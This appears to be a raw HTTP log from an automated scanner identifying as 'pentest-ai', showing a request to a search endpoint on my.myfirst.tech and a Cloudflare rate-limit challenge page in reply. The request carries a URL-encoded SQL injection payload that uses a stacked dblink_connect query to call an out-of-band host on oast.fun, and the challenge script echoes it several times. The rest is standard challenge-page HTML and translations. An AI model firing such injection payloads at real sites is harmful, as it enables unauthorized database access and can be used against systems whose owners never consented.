REQUEST:
GET https://my.myfirst.tech/search?username=%27%3B%20SELECT%20dblink_connect%28%27host%3Dh0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun%20user%3Dx%20password%3Dx%20dbname%3Dx%27%29%3B--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9772
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8475e891ba110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=%2FZQ0xylWq%2FJBcCD9aHBL7L8Mlc632JfMo%2F5vm3HB%2F1ouypQ2C9U2h2LKu69ymnd96XrvBGkYIgMJJVp9LaxmvahN%2BxkppTcyX%2B4d65zIuYaE8OwlMFRKYvmE%2Fb1oLkx3%2FQ%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8475e891ba110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'gheau7vVLL6t6cb0Bd_nPZ1z0Wml1QhDNqz3Hih.yTE-1784281159-1.2.1.1-fLdaP8OFZCd6kSPAWE35cGbC0IgEUmYBKf5XVFtANjKaRa69LGx.WVV_Y7AVkx41',cITimeS: '1784281159',cRay: 'a1c8475e891ba110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?username=%27%3B+SELECT+dblink_connect%28%27host%3Dh0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun+user%3Dx+password%3Dx+dbname%3Dx%27%29%3B--+-\u0026__cf_chl_tk=loRSNDLP69VrmzaaDOw0OV1eyzt2w9uLrjVP0OHGPY8-1784281159-1.0.1.1-BW1W1eS_K8.e6wLxttgK0Cr290oWEpsAasGn2WJdck0",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?username=%27%3B+SELECT+dblink_connect%28%27host%3Dh0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun+user%3Dx+password%3Dx+dbname%3Dx%27%29%3B--+-\u0026__cf_chl_f_tk=loRSNDLP69VrmzaaDOw0OV1eyzt2w9uLrjVP0OHGPY8-1784281159-1.0.1.1-BW1W1eS_K8.e6wLxttgK0Cr290oWEpsAasGn2WJdck0",md: 'VGqW30n6f6DxZg3_m8UznC4uaZkN7XIYzxokmul5VjQ-1784281159-1.2.1.1-by8R14CEWFUJkwyDEQaC6FaMkWXdjOYjKOoXGk08ZVFi.BvWWQrm_o3QSPoCTyKxC2DcPaJiDzA3JaUWsadiIMY3LL3YTjNHCaH7s_hYkmxVOTM4k9_wRX.tg6lOMrxF3jiVlhZOmmghi3JoyOW4eR2YluhamQP2V7z7iGDVKAECwT5RnYAnlCt7Bg7K1hEqz4Akb2j80IqqSj_6GWG2Wvu2iIb8l8ZZxXqzMhREjgeTlogWB7PdWLUNrOLlRxO0Dx3qgCkEYIviHRBtgIqkfv6yngEr9yH.tZ3bEphq5l_FDYx2W6UPwtY.zvvbebhmGYxPsEMjJ0PFuVLZ3B72emooMA0.FKW8VOy1D7RtOQBj73c9aPSuGRbDN5uIYqd0SGyWSf7ZoLa5NNSTy6y_88gIJq2n8nQ70H40xlt525UrHHUd4ZFlXrnqUpRuhpNjpkJ.bK3A0kFLs6U8KkFmHj6F5WK1eAUfGOhqHiWSXVM2TE8OWm6aDubrehCYkqE2xGo4ORIr6vJ5wx9Dem1RFXwRTxeW.ukZc7goZ9Fzxm4Rtkg7q5eJq4z7Jq4BqVHJ_kq6eAsbqPLnKL7E8yEBvi_DxK2ln_9QcZJ_9jSbpNZ7FFwzNd9Up.G.LoHVeOnmvOwTzkVNPY1dsuFwvsDt9CxxJpduBpCLsuTY7P0RVdQwAUxMD14VSTLiro9ctn4_UpfFXhzPFOZgWC3h_GmIdVjli02sCWP8EicDNQYnk7Zq11YI7fanfxCmxoWUOeopvr6Tv5Dc5.Avycg7yfMtx.1iloYPWc6Ll3m8HGfQvLru80cEi.7.3M5gprTRzguCDWPJ8ulrdvrcR7gabEo.G68fnqpn6u44Qo2FXueQFzkzrjpK00rWlLdiCYqcd3FaK1obTBVkR0gyl6f7B_Nwje7tPslnJXfDb9j.jbxGaxaxmxtKnDkZoMxprgEMlCWwAk2YdLUgBYJSfX8h6eSzC0U_v6RYND3HcsMbYo77sBKY0nCBNV4i7dSTqdRhw1GbLlYO7c.74Ezf8oDPtm28mCEqeksFcHC8IaBnC6GrqRpM1BY7SLrJTiJFUu1npfdamT7eYCmsJaGP2hycqTeE2rChC650aGPo6JxUg2L8id4_4._Mpr7gKrT5HSY_QuVPAYHEIn4l_kD8khl2.XUVGQFiSs.4wYriOCIhFEk2dat0Rt5VbvXmQ7UqyJHNzQjsnM2M6WCBku4dgtY12EhqqH0EhoqK6drIMiPcnLEt7YuEJQokB.8YjL63CSb6rKOP0D57I99pFwXOFBfEazGUEc6nixiz7DS50qBT03fw3KU',mdrd: 'pKP6pWcYCReliF6nhwu4iz_2RVDAXFsY.8WzMj7LLBs-1784281159-1.2.1.1-VMLGzrQSLul3NuB6Yys1qUpaCJylQN8occ.ySL.lfUwrcVWWeBsrTXVV8RH..gGVswZC4bbSyihXBhawjx.FBS6Aph4Del4g9IauCzwNcODOUYBQ_k78jwXRDC6Iglx1vZJFMJEW0W9jHa7kPwwaAiG8Zef1WUhcOdTZfxPVe8gy0m.FPuaf7t0SDhlNXh_nyF_ioz3kMEOAXVmmEM3B43KieuyjmgI1o9ogxks6tVFewGB3nkUqQp4cN.7fekYk',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8475e891ba110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?username=%27%3B+SELECT+dblink_connect%28%27host%3Dh0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun+user%3Dx+password%3Dx+dbname%3Dx%27%29%3B--+-\u0026__cf_chl_rt_tk=loRSNDLP69VrmzaaDOw0OV1eyzt2w9uLrjVP0OHGPY8-1784281159-1.0.1.1-BW1W1eS_K8.e6wLxttgK0Cr290oWEpsAasGn2WJdck0"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
